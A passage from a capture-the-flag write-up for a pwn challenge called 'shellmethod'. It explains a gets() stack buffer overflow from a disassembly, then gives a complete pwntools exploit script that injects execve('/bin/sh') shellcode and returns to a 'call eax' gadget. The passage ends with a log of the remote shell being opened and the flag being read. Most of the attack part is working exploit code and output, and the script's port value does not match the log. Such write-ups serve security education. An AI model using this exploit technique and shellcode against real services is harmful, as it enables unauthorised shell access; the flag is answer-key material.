   0x080484db <+16>:	add    esp,0x4
   0x080484de <+19>:	push   0x80485db
   0x080484e3 <+24>:	call   0x8048380 <printf@plt>
   0x080484e8 <+29>:	add    esp,0x4
   0x080484eb <+32>:	lea    eax,[ebp-0x40]
   0x080484ee <+35>:	push   eax
   0x080484ef <+36>:	call   0x8048390 <gets@plt>
   0x080484f4 <+41>:	add    esp,0x4
   0x080484f7 <+44>:	nop
   0x080484f8 <+45>:	leave  
   0x080484f9 <+46>:	ret    
End of assembler dump.

We see that the memory address location of stack variable command[64] is loaded into $eax at 0x080484eb <+32>. This means that $eax points to the start of command[64], which is our input!

Now, we just need to find a call eax or jmp eax instruction in the executable and insert an appropriate shellcode to do execve('/bin/sh'). Luckily for us, call eax instruction exists in the deregister_tm_clones()!

Solution

Source code of exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python

from pwn import *
context(arch = 'i386', os = 'linux')

HOST = 'pwn2.chal.gryphonctf.com'
PORT = 1734117343

# execve('/bin/sh') shellcode
shellcode = ''.join([
    asm('xor ecx, ecx'),             # make ecx 0
    asm('mul ecx'),                  # make eax = 0 too
    asm('push ecx'),                 # push null byte to terminate '/bin//sh' str
    asm('push ' + str(u32('//sh'))), # push //sh
    asm('push ' + str(u32('/bin'))), # push /bin
    asm('mov ebx, esp'),             # set ebx to point to '/bin//sh\x00' using esp
    asm('mov al, 11'),               # set eax = 11 (syscall number for execve)
    asm('int 0x80')                  # invoke interrupt
])

# [ shellcode || padding || stored eip ]
offset_to_stored_eip = 64 + 4
ret2shellcode = p32(0x08048433)
payload = shellcode.ljust(offset_to_stored_eip, 'A') + ret2shellcode

def main():
    r = remote(HOST, PORT)
    r.sendline(payload)
    r.interactive()

if __name__ == '__main__':
    main()

Execution of the exploit script:

$ python shellmethod-pwn.py
[+] Opening connection to pwn2.chal.gryphonctf.com on port 17344: Done
[*] Switching to interactive mode
HELLO. I AM SMARTBOT ALPHA 0.1.0.
PLEASE STATE YOUR COMMAND.
Your response?
$ ls -al
total 32
drwxr-xr-x 1 root root        4096 Oct  4 13:24 .
drwxr-xr-x 1 root root        4096 Oct  4 13:16 ..
-rw-r--r-- 1 root root         220 Oct  4 13:16 .bash_logout
-rw-r--r-- 1 root root        3771 Oct  4 13:16 .bashrc
-rw-r--r-- 1 root root         655 Oct  4 13:16 .profile
-r--r----- 1 root shellmethod   35 Sep 30 17:57 flag.txt
-rwxr-sr-x 1 root shellmethod 7516 Sep 30 17:57 shellmethod
$ cat flag.txt
GCTF{5h3llc0d35_4r3_ju57_4553mbly}

Flag: GCTF{5h3llc0d35_4r3_ju57_4553mbly}